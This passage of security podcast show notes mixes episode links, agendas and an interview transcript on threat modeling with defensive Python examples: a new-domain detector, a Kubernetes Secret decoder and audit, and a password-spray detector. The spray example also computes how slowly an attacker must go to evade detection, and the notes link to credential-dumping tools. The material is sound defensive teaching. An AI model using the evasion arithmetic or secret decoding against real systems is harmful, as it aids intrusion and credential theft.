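    return ".".join(labels)


def newly_seen_hits(log_text, max_age_hours=24, min_history_days=7):
    """Walk the log in time order, learning each domain's first-seen time, and
    report lookups of domains first observed less than max_age_hours earlier.

    Caveat (the 'cons' side): with no history every domain is new on day one,
    so lookups made during the first min_history_days only train the
    first-seen table and are not reported. A global view like Umbrella's
    shortens that warm-up; a single resolver has to live with it."""
    first_seen = {}
    start = None
    hits = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ts, client, qname = line.split()
        when = datetime.fromisoformat(ts)
        if start is None:
            start = when
        dom = registrable_domain(qname)
        first_seen.setdefault(dom, when)
        if when - start < timedelta(days=min_history_days):
            continue
        if when - first_seen[dom] < timedelta(hours=max_age_hours):
            hits.append((ts, client, qname, dom))
    return hits
```

In the constructed log the phishing lookalike is flagged on first contact (both hostnames collapse to one registrable domain), while the same domain two days later has aged out of “newly seen”, which is exactly the “good filter time” trade-off: a longer window catches slower campaigns but blocks more legitimate new sites.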
Amanda: windows logging issues
well…. FUCKING EVERYTHING CREATES TASKS IN SCHEDULER
https://www.microsoft.com/en-us/windowsforbusiness/windows-atp
Breach news:
https://www.dutchnews.nl/news/2019/05/hackers-steal-key-info-about-home-hunters-from-housing-agency/
FTA: The hackers now have their name, address, contact information and copies of their passport or ID card, which includes their personal identification number, or BSN.
This is sufficient to allow the hackers to open bank accounts or take out loans by using other people’s identity.
Mostly colos, data centers, ‘aaS’ providers
Many in the Mid-West
Book Club
Cult of the dead cow - June
Tribe of Hackers - July
The Mastermind - August
The Cuckoo’s Egg - September
https://www.infoseccampout.com
EventBrite Link:https://www.eventbrite.com/e/infosec-campout-tickets-61915087694
https://static1.squarespace.com/static/556340ece4b0869396f21099/t/5cc9ff79c830253749527277/1556742010186/Red+Team+Practice+Lead.pdf
https://www.reddit.com/r/netsec/comments/bonwil/prevent_a_worm_by_updating_remote_desktop/
https://www.elastic.co/guide/en/elasticsearch/reference/current/configuring-security.html
https://www.elastic.co/blog/found-elasticsearch-security
https://dzone.com/articles/securing-your-elasticsearch-cluster-properly
Auth is possible, using reverse proxy… this is basic auth :( https://github.com/Asquera/elasticsearch-http-basic
Here’s one that uses basic auth and LDAP: https://mapr.com/blog/how-secure-elasticsearch-and-kibana/
2fa setup: https://www.elastic.co/guide/en/cloud/current/ec-account-security.html
Published on: May 20, 2019
Things I learned this week:
https://www.securusglobal.com/community/2013/12/20/dumping-windows-credentials/
https://www.helpnetsecurity.com/2019/04/29/docker-hub-breach/
https://www.zdnet.com/article/a-hacker-is-wiping-git-repositories-and-asking-for-a-ransom/
https://attack.mitre.org/techniques/T1003/
https://github.com/giMini/PowerMemory
https://en.wikipedia.org/wiki/Local_Security_Authority_Subsystem_Service
https://attack.mitre.org/techniques/T1208/
Published on: May 14, 2019
K8s security with Omer Levi Hevroni (@omerlh)
service tickets -
Super-Dev
Omer’s requirements for storing secrets:
Gitops enabled
Kubernetes Native
Secure
“One-way encryption”
Omer’s slides and youtube video:
https://www.slideshare.net/SolutoTLV/can-kubernetes-keep-a-secret
https://www.youtube.com/watch?v=FoM3u8G99pc&&index=14&t=0s
We’ve all experienced it: you’re working on a task, adding some code, and then you need to store some sensitive configuration value. It could be an API key, client secret or an encryption key ― something that’s highly sensitive and must be kept secret. And this is where things get messy. Usually, secret storage is highly coupled with how the code is deployed, and different platforms have different solutions. Kubernetes has a promise to simplify this process by using the native secret object, which, as the name implies, can be used to store secrets or sensitive configurations. Unfortunately, Kubernetes secrets are fundamentally broken, and a developer who tries to use them will definitely have some issues. But no need to worry ― there are solid alternatives for storing secrets securely on Kubernetes platform. One solution is to use Kamus, an open-source, git-ops solution created by Soluto, for managing secrets on Kubernetes. Kamus can encrypt a secret so it can be decrypted only by your app on runtime - and not by anyone else. The first part of this session will cover the challenges faced when using Kubernetes secrets (from a usability and security point of view). The second part will discuss some of the existing solutions (Sealed Secrets, Helm Secrets and others), their pros, and cons, and then feature Kamus: how it works, what problems it solves, how it differs from other solutions, and what threats it can help mitigate (and what threats it can’t). The talk will cover all that is required to know so you can run Kamus on your own cluster and use it for secret management. Join me for this session to learn how you can build a Kubernetes cluster that can keep a secret ― for real.
Speaker: Omer Levi Hevroni
Kubernetes Secrets
Bad, because manifest files hold the user/password, and are encoded in Base64
Could be uploaded to git = super bad
https://kubernetes.io/docs/concepts/configuration/secret/
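An added example (not code from Kubernetes, Kamus or the talk) of why “encoded in Base64” offers no protection once a Secret manifest lands in git: a few lines recover every value, and the same lines make a usable pre-commit check. The manifest is constructed; it is JSON rather than YAML only so the example needs nothing outside the standard library (kubectl accepts both).

```python
"""Why a Kubernetes Secret manifest in git is a plaintext leak: 'data' values
are Base64, which is encoding, not encryption. Added example, not code from
Kubernetes, Kamus or the talk. The manifest is constructed; it is JSON rather
than YAML only to stay stdlib-only (kubectl accepts both)."""
import base64
import json

# Constructed: what a hand-written Secret manifest checked into a repo, or
# `kubectl get secret db-creds -o json`, would contain.
SECRET_MANIFEST = json.dumps({
    "apiVersion": "v1",
    "kind": "Secret",
    "metadata": {"name": "db-creds", "namespace": "shop"},
    "type": "Opaque",
    "data": {
        "username": base64.b64encode(b"shop_app").decode(),
        "password": base64.b64encode(b"hunter2-but-longer").decode(),
    },
})


def find_secrets(manifest_text):
    """Return the Secret objects in a JSON manifest: a single object or a v1
    List (as produced by `kubectl get ... -o json`). Other kinds are ignored."""
    doc = json.loads(manifest_text)
    items = doc.get("items", []) if doc.get("kind") == "List" else [doc]
    return [obj for obj in items if obj.get("kind") == "Secret"]


def decode_secret_data(secret):
    """Recover the plaintext of every 'data' entry with nothing but b64decode;
    'stringData' entries are already plaintext and are returned as-is."""
    plain = {}
    for key, val in secret.get("data", {}).items():
        plain[key] = base64.b64decode(val).decode("utf-8", errors="replace")
    plain.update(secret.get("stringData", {}))
    return plain


def audit_manifest(manifest_text):
    """Pre-commit style check: list every Secret that carries inline values,
    with the keys exposed. A Secret object with empty data (one a controller
    fills in at runtime) is not reported."""
    findings = []
    for secret in find_secrets(manifest_text):
        exposed = decode_secret_data(secret)
        if exposed:
            name = secret.get("metadata", {}).get("name", "<unnamed>")
            findings.append((name, sorted(exposed)))
    return findings
```

The scanner is the “could be uploaded to git” control: wire audit_manifest into a pre-commit or CI step and fail the build on any finding. The Kamus/Sealed Secrets approach is the complement: what gets committed is ciphertext that only the cluster (or only the app, in Kamus’ model) can turn back into a usable Secret.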
https://docs.travis-ci.com/user/encryption-keys/
Kamus threat model on Github: https://kamus.soluto.io/docs/threatmodeling/threats_controls/
“FaaS is a relatively new concept that was first made available in 2014 by hook.io and is now implemented in services such as AWS Lambda, Google Cloud Functions, IBM OpenWhisk and Microsoft Azure Functions.”
Best practices: https://kubernetes.io/docs/tasks/administer-cluster/securing-a-cluster/
https://github.com/owasp-cloud-security/owasp-cloud-security
https://www.omerlh.info/2019/01/19/threat-modeling-as-code/
https://telaviv.appsecglobal.org/
https://github.com/Soluto/kamus
Infosec Campout = www.infoseccampout.com
Published on: May 5, 2019
Agenda:
Announce the conference
CFP: up soon
CFW: up soon
Campers: Friday night/Saturday night
Like “toorcamp”, but if it sucks, you can drive home… :D
Limiting tickets, looking for sponsors
To support the conference and future initiatives:
“Infosec Education Foundation”
501c3 non-profit (we are working on the charity part)
Password spraying
https://github.com/dafthack/DomainPasswordSpray
Stories:
https://blog.stealthbits.com/using-stealthdefend-to-defend-against-password-spraying/
http://blog.quadrasystems.net/post/password-spray-attacks-and-four-sure-steps-to-disrupt-them
https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/simplifying-password-spraying/
Detecting one-to-many (one password tried against many accounts)… and at what point/threshold during an attack would the red team have to slow down enough that it becomes a PITA for them?
Annoying NXLog CE limitation
Log-MD can help detect? Yep
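An added example of the one-to-many detection discussed above, and of the threshold arithmetic behind the “how slow does the red team have to go” question. It is not code from DomainPasswordSpray, Log-MD or NXLog; the events are constructed as a flattened “timestamp source target_account” form of what a Windows 4625 (failed logon) event carries, and the 30-minute/5-account defaults are assumptions to tune against your own baseline.

```python
"""Detect a password spray (one password tried against many accounts) from
failed-logon events and quantify the threshold trade-off raised above. Added
example, not from DomainPasswordSpray, Log-MD or NXLog. Events are constructed
as a flattened "timestamp source target_account" form of what a Windows 4625
(failed logon) event carries."""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed: 10.0.0.77 tries one password against six accounts, once each,
# which stays under any per-account lockout threshold. 10.0.0.12 is one user
# mistyping their own password three times.
FAILED_LOGONS = """\
2019-05-01T02:00:00 10.0.0.77 asmith
2019-05-01T02:00:03 10.0.0.77 bjones
2019-05-01T02:00:06 10.0.0.77 cwu
2019-05-01T02:00:09 10.0.0.77 dlee
2019-05-01T02:00:12 10.0.0.77 epatel
2019-05-01T02:00:15 10.0.0.77 fgarcia
2019-05-01T08:15:00 10.0.0.12 hmoore
2019-05-01T08:15:20 10.0.0.12 hmoore
2019-05-01T08:15:45 10.0.0.12 hmoore
"""


def parse_failed_logons(text):
    """Return [(datetime, source, account)] from the flattened log."""
    events = []
    for line in text.splitlines():
        if line.strip():
            ts, src, user = line.split()
            events.append((datetime.fromisoformat(ts), src, user))
    return events


def detect_spray(events, window_minutes=30, min_distinct_accounts=5):
    """One-to-many check: any source that fails against at least
    min_distinct_accounts distinct accounts inside a sliding window.
    Per-account failure counts are deliberately ignored; lockout already
    covers them, and a spray is built to stay under that threshold.
    Returns {source: peak distinct accounts seen in one window}."""
    by_src = defaultdict(list)
    for when, src, user in sorted(events):
        by_src[src].append((when, user))
    window = timedelta(minutes=window_minutes)
    alerts = {}
    for src, hits in by_src.items():
        lo = 0
        for hi in range(len(hits)):
            while hits[hi][0] - hits[lo][0] > window:
                lo += 1
            distinct = {user for _when, user in hits[lo:hi + 1]}
            if len(distinct) >= min_distinct_accounts:
                alerts[src] = max(alerts.get(src, 0), len(distinct))
    return alerts


def min_spray_duration(n_accounts, window_minutes=30, min_distinct_accounts=5):
    """The red team's side of the threshold: to stay under detect_spray an
    attacker can touch at most min_distinct_accounts - 1 new accounts per
    window, with batches spaced more than one window apart. Returns the
    minimum minutes needed to spray n_accounts once. With the defaults,
    1000 accounts take 7470 minutes, about five days, per password."""
    per_window = min_distinct_accounts - 1
    batches = -(-n_accounts // per_window)  # ceiling division
    return (batches - 1) * window_minutes
```

The detector fires on the six-account burst and stays quiet on the single user fat-fingering their password, and min_spray_duration puts a number on the question in the notes: at 5 accounts per 30 minutes, one password across 1000 accounts costs the attacker roughly five days, which is the slowdown that makes a spray a pain to run. Sources that rotate (proxies, many hosts) split the count, so key on source hostname or subnet, not just IP, when your logs allow it.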
CTF Club is happening again
Pinkie Pie is running it.
Saturdays at 2 -3 pm
Published on: April 29, 2019
Announcements:
SpecterOps (red Team operations) and Tim Tomes (PWAPT)
Bsides Nashville
https://blog.secureideas.com/2019/04/we-take-security-seriously-and-other-trite-statements.html
“We take security seriously and other trite statements“
Wordpress infrastructure (supply chain failure)
WordPress plugin called Woocommerce was at fault.
Vuln late last year: https://www.bleepingcomputer.com/news/security/wordpress-design-flaw-woocommerce-vulnerability-leads-to-site-takeover/
“According to new research by Simon Scannell, a researcher for PHP Security firm RIPS Tech, when WooCommerce is installed it will create a Shop Manager role that has the "edit_users" WordPress capability/permission. This capability allows users to edit ANY WordPress user, including the Administrator account.”
“https://blog.ripstech.com/2018/wordpress-design-flaw-leads-to-woocommerce-rce/”
You (Kevin) discovered the admin accounts, but could not remove them. Was that when you considered this an ‘incident’?
Timeline:
“[2019-03-22 09:03 EST] Kevin assigns members of the Secure Ideas team with reconnaissance and mapping of the AoM system. Kevin reminds these members that Secure Ideas doesn’t have permission to test AoM. They are advised not to do anything that could harm the AoM’s production environment.”
What is the line they should not cross in this case?
You did not have access to logs, you asked that an audit plugin be installed to be able to view logs. Is that permanent, and why did they not allow access to logs prior to?
[2019-03-22 13:11 EST] AoM Support fixes the audit log plugin access. AoM Support has found that a purchase of a course through a Woocommerce plugin resulted in users being granted admin access. AoM Support provides specific order numbers. They have also done an analysis of the database backups from the last 60 days and believe that the attackers did not do anything after they got access. AoM Support announces that the Secure Ideas training site will be set up on a separate server and Secure Ideas will be granted a new level of access.
Seems like working with AoM wasn’t difficult. Was giving you access to your own instance, and allowing you to administer it a big deal for them?
Lessons Learned? Anything you’d do differently next time?
Update IR plan?
Did they reach out for additional testing?
Did the people who got admin get removed?
Consult with AoM on better security implementation? Your env wasn’t damaged, but did they suffer issues with other customers? *answered*
https://en.wikipedia.org/wiki/Gremlins
Gas Station skimmer video - https://www.facebook.com/michellepedraza.journalist/videos/2135141863465247/
https://www.helpnetsecurity.com/2019/04/12/cybersecurity-incident-response-plan/
https://www.guardicore.com/2018/11/security-incident-response-plan/
https://www.zdnet.com/article/security-risks-of-multi-tenancy/
Upcoming SI events
IANS forum (Wash DC)
ShowmeCon
Webcasts
ISC2 security Congress (Wash DC)
Patreon
Slack
Twitter handles
iTunes
Published on: April 22, 2019
Announcements:
WorkshopCon Training with SpecterOps and Tim Tomes
www.workshopcon.com
redteam operations with SpecterOps
PWAPT with Tim Tomes
Source Boston, Boston, MA (April 29 – May 3, 2019): https://sourceconference.com/events/boston19/ Trainings: April 29 - April 30, 2019 | Conference: May 1 - 3, 2019
Cybernauts CTF meetup in Austin Texas at Indeed offices, 23 April at 5pm Central time.
https://nakedsecurity.sophos.com/2019/04/02/wrecked-teslas-hang-onto-your-unencrypted-data/
My last car sync’ed the contact list.
Video is a different story, but safety for the vehicle and owner, they’ll probably continue to store it.
Telemetry data is for changing road conditions, navigation, etc
Enable encryption at rest… or pop a fuse to scram the data when/if an accident is detected
Level of difficulty, no fuse, requires hardware upgrade
Encryption at rest, ensuring HTTPS on all incoming/outgoing.
Annoying “do you want notifications from this site?”
Like an annoying RSS feed… ‘Hey, we added a new banner ad!’
https://www.phoronix.com/scan.php?page=news_item&px=Linux-Improve-CPU-Spec-Switches
Why add the switches to allow vulnerabilities?
Slippery slope --disable-dirtycow?
https://www.wamc.org/post/details-still-few-city-albany-s-ransomware-attack
Threat intelligence and software detections…
Got an email… *Story Time from Mr. Boettcher*
Twitter: why do companies not allow copy/paste in password fields? Tesla
Published on: April 15, 2019
Announcements:
SpecterOps and Tim Tomes are giving training at WorkshopCon https://www.workshopcon.com
Rob Cheyne Source Boston - https://sourceconference.com/events/boston19/
Austin Cybernauts meetup - https://www.eventbrite.com/e/cybernauts-ctf-meetup-indeed-tickets-58816141663
SHOW NOTES:
Architecture is not an implementation, but a way of thinking about a problem that has potentially many different answers, and no one single "correct" answer.
“…is to normalize the range in the coverage and level of rigor available in the market when it comes to performing Web application security verification using a commercially-workable open standard.” --ASVS preface
#ASVS team:
https://drive.google.com/file/d/17-NDN7TWdC-vZLbsKkkBFhrYmUhF6907/view?usp=sharing
https://www.owasp.org/images/3/33/OWASP_Application_Security_Verification_Standard_3.0.1.pdf - old version
http://traffic.libsyn.com/brakeingsecurity/2015-046_ASVS_with_Bill_Sempf.mp3 - Older BrakeSec Episode
ASVS Page 14 - “If developers had invested in a single, secure identity provider model, such as SAML federated identity, the identity provider could be updated to incorporate new requirements such as NIST 800-63 compliance, while not changing the interfaces of the original application. If many applications shared the same security architecture and thus that same component, they all benefit from this upgrade at once. However, SAML will not always remain as the best or most suitable authentication solution - it might need to be swapped out for other solutions as requirements change. Changes like this are either complicated, so costly as to necessitate a complete re-write, or outright impossible without security architecture.”
What are the biggest differences between V3 and V4?
Why was a change needed?
https://xkcd.com/936/ - famous XKCD password comic
David Cybuck: Appendix C: IoT
Why was this added?
These controls are in addition to all the other ASVS controls?
How do they see section 1 architecture and section 14, configuration --- in the context of rapid deployment, infrastructure as code, containerization.
You added IoT, but not ICS or SCADA?
https://www.owasp.org/index.php/OWASP_ICS_/_SCADA_Security_Project
BrakeSec IoT Top 10 discussion:
http://traffic.libsyn.com/brakeingsecurity/2019-001.mp3
http://traffic.libsyn.com/brakeingsecurity/2019-002-aaron_guzman_pt2.mp3
Seems incomplete… (Section 1.13 “API”)
Will this be added later?
What is needed to fill that in? (manpower, SME’s, etc?)
3 levels of protection… why have levels at all?
Why shouldn’t everyone be at Level 3?
I just don’t like the term ‘bare minimum’ (level 1)--brbr
Threat modeling blog (leviathan): https://www.leviathansecurity.com/blog/the-calculus-of-threat-modeling
Adam Shostack ThreatModeling Book: https://www.amazon.com/Threat-Modeling-Designing-Adam-Shostack/dp/1118809998
https://www.owasp.org/images/archive/6/65/20170626175919!TM-Lessons-Star-Wars-May-2017.pdf
https://www.youtube.com/watch?v=2C7mNr5WMjA
Cost to get to L2? L3?
https://manicode.com/ secure coding education
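The decoupling the ASVS passage above argues for, as an added example that is not code from ASVS, OWASP or the show: the application depends only on an IdentityProvider boundary, two hypothetical providers (a SAML-style one and an OIDC-style one) sit behind it, and a NIST 800-63-style assurance rule is added once, in a wrapper around the shared component, rather than in each application. The provider classes, token fields, the context-class-to-AAL mapping and the min_aal knob are assumptions for illustration; real assertions would be signature-checked before they reach this code.

```python
"""Added example (not code from ASVS, OWASP or the show): the application codes
against one shared identity-provider boundary, so the provider can be swapped
(SAML-style for OIDC-style) and a new rule (an assurance level in the spirit
of NIST SP 800-63B) is enforced once, behind the same interface. Provider
classes, token layouts, the AAL mapping and 'min_aal' are all hypothetical."""
from __future__ import annotations
import time
from dataclasses import dataclass
from typing import Callable, Protocol

@dataclass(frozen=True)
class Principal:
    subject: str
    aal: int  # authenticator assurance level actually achieved (1 or 2)

class AuthError(Exception):
    pass

class IdentityProvider(Protocol):
    """The only authentication surface the application may depend on."""
    def verify(self, assertion: dict) -> Principal: ...

# Hypothetical policy mapping: SAML AuthnContext classes we treat as multi-factor.
MFA_CONTEXT_CLASSES = {
    "urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken",
    "urn:oasis:names:tc:SAML:2.0:ac:classes:SmartcardPKI",
    "urn:oasis:names:tc:SAML:2.0:ac:classes:MobileTwoFactorContract",
}

class SamlLikeProvider:
    """Consumes a constructed, pre-parsed SAML-style assertion; signature
    verification is assumed to have happened upstream."""
    def __init__(self, audience: str, now: Callable[[], float] = time.time):
        self.audience, self.now = audience, now
    def verify(self, assertion: dict) -> Principal:
        if assertion.get("Audience") != self.audience:
            raise AuthError("audience mismatch")
        if assertion.get("NotOnOrAfter", 0) <= self.now():  # epoch seconds (constructed)
            raise AuthError("assertion expired")
        ctx = assertion.get("AuthnContextClassRef", "")
        return Principal(assertion["NameID"], 2 if ctx in MFA_CONTEXT_CLASSES else 1)

class OidcLikeProvider:
    """Consumes an OIDC-style ID-token claim set; 'amr' values as in RFC 8176."""
    def __init__(self, audience: str, now: Callable[[], float] = time.time):
        self.audience, self.now = audience, now
    def verify(self, claims: dict) -> Principal:
        if claims.get("aud") != self.audience:
            raise AuthError("audience mismatch")
        if claims.get("exp", 0) <= self.now():
            raise AuthError("token expired")
        amr = set(claims.get("amr", []))
        multi = "mfa" in amr or len(amr & {"pwd", "otp", "hwk", "sms"}) >= 2
        return Principal(claims["sub"], 2 if multi else 1)

class RequireAssurance:
    """Wraps any provider: the 800-63-style upgrade lands here, once, for every
    application that shares the component."""
    def __init__(self, inner: IdentityProvider, min_aal: int):
        self.inner, self.min_aal = inner, min_aal
    def verify(self, assertion: dict) -> Principal:
        p = self.inner.verify(assertion)
        if p.aal < self.min_aal:
            raise AuthError(f"AAL{p.aal} below required AAL{self.min_aal}")
        return p

def login(idp: IdentityProvider, assertion: dict) -> str:
    """Application code: it never learns which provider sits behind the boundary."""
    try:
        principal = idp.verify(assertion)
    except AuthError:
        return "denied"
    return f"welcome {principal.subject}"

def demo() -> dict:
    """Same application, two providers, before and after the requirement change."""
    fixed_now = lambda: 1_700_000_000  # constructed clock, keeps the run deterministic
    saml = SamlLikeProvider("https://app.example/", now=fixed_now)
    oidc = OidcLikeProvider("app-client-id", now=fixed_now)
    saml_password_only = {  # constructed sample assertion, password-only login
        "NameID": "alice", "Audience": "https://app.example/", "NotOnOrAfter": 1_700_000_300,
        "AuthnContextClassRef": "urn:oasis:names:tc:SAML:2.0:ac:classes:Password",
    }
    oidc_with_mfa = {  # constructed sample claims, password + OTP
        "sub": "bob", "aud": "app-client-id", "exp": 1_700_000_300, "amr": ["pwd", "otp"],
    }
    results = {"saml_before": login(saml, saml_password_only),
               "oidc_before": login(oidc, oidc_with_mfa)}
    # Requirement change applied in the shared component only; login() is untouched.
    results["saml_after"] = login(RequireAssurance(saml, min_aal=2), saml_password_only)
    results["oidc_after"] = login(RequireAssurance(oidc, min_aal=2), oidc_with_mfa)
    return results
```

Calling demo() shows the password-only SAML login accepted before the rule change and denied after it, while the MFA-backed OIDC login keeps working; login() itself never changed, which is the point the ASVS passage makes about investing in a single shared identity component.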
Check out our Store on Teepub! https://brakesec.com/store
Join us on our #Slack Channel! Send a request to @brakesec on Twitter or email [email protected]
#Brakesec Store!:https://www.teepublic.com/user/bdspodcast
#Spotify: https://brakesec.com/spotifyBDS
#RSS: https://brakesec.com/BrakesecRSS
#Youtube Channel: http://www.youtube.com/c/BDSPodcast
#iTunes Store Link: https://brakesec.com/BDSiTunes
#Google Play Store: https://brakesec.com/BDS-GooglePlay
Our main site: https://brakesec.com/bdswebsite
#iHeartRadio App: https://brakesec.com/iHeartBrakesec
#SoundCloud: https://brakesec.com/SoundcloudBrakesec
Comments, Questions, Feedback: [email protected]
Support Brakeing Down Security Podcast by using our #Paypal: https://brakesec.com/PaypalBDS OR our #Patreon
https://brakesec.com/BDSPatreon
#Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir
#Player.FM : https://brakesec.com/BDS-PlayerFM
#Stitcher Network: https://brakesec.com/BrakeSecStitcher
#TuneIn Radio App: https://brakesec.com/TuneInBrakesec
Published on: April 7, 2019
Show Notes
SpecterOps and Tim Tomes are giving training at WorkshopCon https://www.workshopcon.com
Rob Cheyne Source Boston - https://sourceconference.com/events/boston19/
Architecture is not an implementation, but a way of thinking about a problem that has potentially many different answers, and no one single "correct" answer.
“is to normalize the range in the coverage and level of rigor available in the market when it comes to performing Web application security verification using a commercially-workable open standard. “
ASVS team:
Don’t post these links in show notes
ASVS list (google sheet): https://drive.google.com/open?id=1xFLmvNoR2tohk08cQDLU46FWNgpx28wd
ASVS PDF: https://drive.google.com/file/d/17-NDN7TWdC-vZLbsKkkBFhrYmUhF6907/view?usp=sharing
Published on: April 1, 2019
Log-MD story
SeaSec East meetup
Gabe (county Infosec guy)
New Slack Moderator (@cherokeeJB)
Shoutout to “Jerry G”
Mike P on Slack: https://www.eventbrite.com/e/adversary-tactics-red-team-operations-training-course-dc-april-2019-tickets-54735183407
www.Workshopcon.com/events and that we're looking for BlueTeam trainers please
Any chance you can tag @workshopcon. SpecterOps and lanmaster53 when you post on Twitter and we'll retweet
Noid - @_noid_
Bsides Talk (MP3) - https://github.com/noid23/Presentations/blob/master/BSides_2019/Noid_Seattle_Bsides.mp3
Slides (PDF)
Security view was a bit myopic?
“What do we win by playing?”
Cultivating relationships (buy lunch, donuts, etc)
Writing reports
Communicating findings that resonate with developers and management
Often pentest reports are seen by various facets of folks
Many levels of competency (incompetent -> super dev/sec)
Communicating risk? Making bugs make sense to everyone…
The three types of power:
https://www.manager-tools.com/2018/03/three-types-power-and-one-rule-them-part-1 (yas!)
Transcription (courtesy of otter.ai, and modified for readability by Bryan Brake)
Bryan Brake 0:13
Hello everybody, this is Bryan from Brakeing Down Security. This week you're gonna hear part two of our interview with Noid. We did a lot of interesting discussions with him and it went so well that we needed the second week, so for those of you just catching this now, Part One was last week, so you can just go back and download that one. We're going to start leading in with the "one of us" story, because one of the slides he talked about was how, you know, he learned how to be one with his dev team, and one of the last topics we had was kind of personal to me: I do a lot of pentest writing for reports and stuff at my organization, Leviathan, and, you know, we talked about what makes a good report, how to write reports for all kinds of people, whether it be a manager that you're giving it to from an engagement for a customer, or, you know, the technical people who might be fixing the bugs that an engagement person might find, or a pen tester might find in this case. So, yeah, we're going to go ahead and lead in with that. Before we go though, SpecterOps is looking for people to go to their classes. It's their Adversary Tactics: Red Team Operations training course in Tysons Corner, Virginia. It's currently $4,000 US and it's from April 23 to April 26 of this year, 2019. That doesn't include airfare and hotel, so you're gonna have to find your way to Tysons Corner, the Hyatt Regency. There's a link in the show notes, of course, to the class if you'd like to go. You'll learn things like designing and deploying sophisticated, resilient, covert attack infrastructure, gaining initial access footholds on systems using client-side attacks and real-world scenarios, cutting-edge lateral movement methods to move through the enterprise, and a bunch of other cool things...
So yeah, if you're interested in hooking that up, you've still got more than a month to sign up for it. It looks like there might still be tickets, so knock yourselves out. They're also looking for blue team people. "Mike P" on our Slack channel, which we'll tell you about at the end of the show here, on how to join if you'd like, he said http://www.workshopcon.com/events, they're looking for blue team trainers... you can hang out with folks like, you know, SpecterOps and Tim Tomes (LanMaster53) as well there when you, you know, sign up for the blue team stuff, and yeah, http://www.workshopcon.com/events, and then you can, you know, learn to be a blue team trainer or actually give blue team training if you so choose. So that said, it's pretty awesome. Alright, so without further ado, we're going to get started with part two of our interview with Noid here. Hope you have a great week. And here we go.
Okay. So I think we've gotten down to, like, the "one of us" story, where our hero finally starts to get it and begins to bridge the gap. Some of the points, the lessons learned in this story, and you can tell us about the story, were that language makes all the difference in the world. This is what got me on to the part about the reporting, which we'll talk about in a little while, but maybe you could fill us in on this discovery, the story that got you to these points.
Brian "Noid" Harden 3:37
Okay, so the team I'm working on, I get asked... the thing in question is, it was a pretty massive product and it had never had any threat modeling done,
Bryan Brake 3:50
okay.
Brian "Noid" Harden 3:51
So it had never had any threat modeling done, and this particular product was made up of tons of little sub-products. So what I did is I sat there first in kind of a complete panic going, this is overwhelming, I don't have nearly enough time or resources to be able to do this. But you know how to eat the elephant, right? In small pieces, and get at it. So I had one dev lead who, I know, had worked previously on a security product. And he was a nice guy. So I sat down with him and basically said, "Hey, could you walk me through visually diagramming how your service works, building that data flow diagram, and then we're going to talk about it from a security perspective." And he was sort of like, oh, that'd be fun, yeah, let's do that. And so we sat there and he diagrammed, and the whole time he's diagramming, he'd stop and erase things and go, wait, no, no, we were going to do it that way, but we didn't. And then, oh, and we stopped doing it this way because we added this other thing and we had to be able to break communication out into a number of channels. And then he stopped at one point and was like, get a picture of this, I think this is probably the most accurate diagram of our service we've ever had. And then when we started doing the threat modeling side of it, like, you know, talking about trust boundaries, and, you know, it's like, all right, so what makes sure that, you know, data from point A to point B is not filled with that kind of thing? And I'm saying, okay, well, could you, you know, do this over HTTPS rather than just regular HTTP?
Bryan Brake 5:29
right
Brian "Noid" Harden 5:31
You know, you get non-repudiation, you know, and it's like, not talking about even the security value of it, but talking more about the, you know, the integrity being there. And then at one point, he stops and he looks at me and he says, man, I never knew threat modeling would generate so much feature work. And in my mind, I was like, talking about feature work? Like, these are bugs you need to fix. Now, all of a sudden, it was like, oh, crap, I've been approaching this entirely the wrong way my entire career. Devs look at things from bug fixing and feature development. And as a security person, every time I'd been bringing up stuff they needed to do, in my mind it was implied it was feature development. But they saw this as bug fixing, because in the "dev world" security fixes are bug fixes. He saw the value here and went, oh, this is going to generate a ton of feature work. And it's like, oh, so I gotta stop calling this security work, I've got to start calling this feature work. And sure enough, not only if you start calling it feature work... and of course now, once you're talking about feature work, you can start talking about the drivers. Why are we building a feature? Because, you know, you don't build features nobody wants. Unless you're certain software companies. But yeah, you build features that come out of customer requests, you know. I look at things like, say, Microsoft Office, how that's evolved over the years, and that's because people who use Office come back and say, you know, this is really cool, but I'd really like it if, when I'm giving my PowerPoint presentation, I had a timer on the screen so I know I'm on mark, you know. And okay, that's a feature request. And so that's how these things evolve.
And so once I started talking about security work from the perspective of feature development, you know, we have existing features that need to be worked on to give them new functionality in order to be able to pick up new customers, and we have new features that we need to build that will also help. Because the other thing, too, I also noticed is that, well... well, I care about things like confidentiality and integrity. Devs care about things like availability and performance, right? These two things can kind of be almost used interchangeably, depending on the circumstance. So when devs are talking about stability, I'm thinking about integrity. When I'm talking about availability, they're thinking about performance. And so all of a sudden, I'm now giving them ideas for, like, new perf counters, basically, like new metrics to check the health of the thing that we're building. And the way I looked at it was almost... yeah, this is the business driver for the, you know, customer X wants it, customer Y needs it, you know, and here's the benefit, you know, the product gets out of it. Here's the benefit that developers get out of it. And what does security get out of it? Hey, don't worry about it. Purely, purely, any value I derive from this work is purely coincidental.
Brian Boettcher 8:57
*Chuckles*
Brian "Noid" Harden 9:00
And that, in turn, helps start driving the conversation a lot better. Because the other value I got out of it, too, is by having somebody on the development side of the house who had a name and had some, you know, reputation behind him, he was able to go to his respective peers and say, man, I did this thing with Noid and it was really valuable, and we got a lot of cool stuff out of it. So he's gonna hit you up about it, and I totally recommend doing it.
Bryan Brake 9:27
right
Brian "Noid" Harden 9:28
And at which point, because some of the folks I worked with were either indifferent towards me, they were just busy... I did have some folks that I worked with, though, that were just flat out adversarial towards me. Frankly, they didn't want me doing what I was doing. They didn't really want me poking around in the dark corners of the product, you know, because it was going to make work. But having somebody on their side say, no, I actually got value out of this... okay, well, I'll give it a try. Holy crap, I got value out of this, too. So that was where I suddenly realized that my language... in my mind, I'm not saying anything differently. But yet, it turns out that when it comes to the words coming out of my mouth and how they were being received, it radically changed how I was expressing myself to people. And it totally changed the response I got.
Brian Boettcher 10:26
So maybe we need a new "CIA" triad that has the other words on it, you know, the, the translated words for development and product teams,
Brian "Noid" Harden 10:35
possibly!
Bryan Brake 10:36
performance... integrity is stability.
Brian "Noid" Harden 10:43
Yeah, stability. Availability...
Bryan Brake 10:48
What's confidentiality then? what does the other bit that they talk about or worry about?
Brian "Noid" Harden 10:52
I don't know. If only we had a dev lead on this call.
Brian Boettcher 10:55
*chuckles*
Bryan Brake 10:56
